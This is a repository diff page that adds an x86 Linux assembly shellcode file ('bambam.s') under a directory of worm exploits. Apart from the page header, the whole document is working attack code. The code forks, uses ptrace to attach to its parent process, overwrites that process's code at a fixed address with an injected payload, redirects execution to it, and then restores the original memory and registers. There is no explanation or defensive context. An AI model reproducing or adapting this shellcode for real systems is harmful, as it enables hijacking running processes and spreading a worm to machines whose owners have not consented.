summaryrefslogtreecommitdiff
path: root/exploits/7350wurm/shellcode/bambam.s
diff options
context:
space:
mode:
Diffstat (limited to 'exploits/7350wurm/shellcode/bambam.s')
-rw-r--r--exploits/7350wurm/shellcode/bambam.s230
1 files changed, 230 insertions, 0 deletions
diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s
new file mode 100644
index 0000000..5719ed7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
1
2 .globl cbegin
3 .globl cend
4
5
6cbegin:
7/* getppid */
8 pushl $64
9 popl %eax
10 int $0x80
11/* movl %eax, %ecx */
12 pushl %eax
13 xchgl %ebp, %eax
14
15/* z_fork */
16 pushl $2
17 popl %eax
18 int $0x80
19 or %eax, %eax
20 je fchild
21
22 /* waitpid (pid, NULL, 0) */
23 pushl $7
24 popl %esi
25 xchgl %esi, %eax /* eax = 7, esi = ppid */
26 xorl %ecx, %ecx
27 xorl %edx, %edx
28 int $0x80
29
30 xorl %eax, %eax
31 movb $162, %al
32 pushl $10
33 pushl $10
34 movl %esp, %ebx
35 movl %esp, %ecx
36 int $0x80
37ui:
38jmp ui
39 /* exit */
40fexit:
41
42 pushl $1
43 popl %eax
44 xorl %ebx, %ebx
45 int $0x80
46
47/*** CHILD ***/
48fchild: pushl $2 /* second fork */
49 popl %eax
50 int $0x80
51
52 or %eax, %eax
53 jne fexit
54
55 popl %ecx /* parent process pid */
56/* ptrace attach */
57 pushl $26
58 popl %eax
59 cdq
60 pushl $16
61 popl %ebx
62 xorl %esi, %esi
63 int $0x80
64
65/* ptrace peekdata */
66 movl $0x08048210, %edx
67/* movl $0xbf7ff010, %edx */
68 movl $0xbffff010, %esi
69 pushl $127
70 popl %edi
71loopa:
72 movl %ebp, %ecx
73 pushl $26
74 popl %eax
75 pushl $2
76 popl %ebx
77 pushl %edi
78 int $0x80
79 popl %edi
80 incl %edx
81 incl %esi
82 decl %edi
83 jnz loopa
84
85/* ptrace getregs */
86 movl %ebp, %ecx
87 pushl $26
88 popl %eax
89 pushl $12
90 popl %ebx
91 pusha
92 movl %esp, %esi
93 int $0x80
94
95/* ptrace setregs */
96 movl %ebp, %ecx
97 pushl $26
98 popl %eax
99 pushl $13
100 popl %ebx
101 movl %esp, %esi
102 movl 48(%esi), %edi
103 pushl %edi
104 movl $0x08048210, 48(%esi)
105/* movl $0xbf7ff010, 48(%esi)*/
106 int $0x80
107
108 jmp pointX
109pointY:
110
111 popl %esi
112 movl $0x08048210, %edx
113 pushl $20
114 popl %edi
115loopc:
116 movl %ebp, %ecx
117 pushl $26
118 popl %eax
119 pushl $5
120 popl %ebx
121 pushl %edi
122 pushl %esi
123 movl (%esi), %esi
124 int $0x80
125 popl %esi
126 popl %edi
127 incl %edx
128 incl %esi
129 decl %edi
130 jnz loopc
131
132
133/* ptrace pokedata */
134/* movl %ebp, %ecx
135 pushl $26
136 popl %eax
137 pushl $5
138 popl %ebx
139 movl $0xccccfeeb, %esi*/
140/* movl $0xbf7ff010, %edx*/
141 movl $0x08048210, %edx
142/* int $0x80*/
143
144/*ptrace cont */
145 movl %ebp, %ecx
146 pushl $26
147 popl %eax
148 cdq
149 pushl $7
150 popl %ebx
151 xorl %esi, %esi
152 int $0x80
153
154/* wait 4 */
155/* 0 on return */
156 cdq
157 movl %eax, %ebx
158 decl %ebx
159 movl %eax, %ecx
160 movb $114, %al
161 int $0x80
162
163/* ptrace pokedata */
164 movl $0x08048210, %edx
165 movl $0xbffff010, %esi
166/* movl $0xbf7ff010, %edx*/
167 pushl $127
168 popl %edi
169loopb:
170 movl %ebp, %ecx
171 pushl $26
172 popl %eax
173 pushl $5
174 popl %ebx
175 pushl %edi
176 pushl %esi
177 movl (%esi), %esi
178 int $0x80
179 popl %esi
180 popl %edi
181 incl %edx
182 incl %esi
183 decl %edi
184 jnz loopb
185
186/* ptrace setregs */
187 popl %edi
188 movl %ebp, %ecx
189 pushl $26
190 popl %eax
191 pushl $13
192 popl %ebx
193 movl %esp, %esi
194 movl %edi, 48(%esi)
195 int $0x80
196
197
198/* ptrace detach */
199 movl %ebp, %ecx
200 pushl $17
201 popl %ebx
202 pushl $26
203 popl %eax
204 cdq
205 movl %edx, %esi
206 int $0x80
207/* exit */
208 xorl %ecx, %ecx
209 incl %esi
210 xchgl %esi, %eax
211 int $0x80
212pointX:
213 call pointY
214
215 pushl $2 /* second fork */
216 popl %eax
217 int $0x80
218 or %eax, %eax
219 je pointA
220 int $0x3
221pointA:
222 jmp pointA
223
224
225
226
227
228cend:
229
230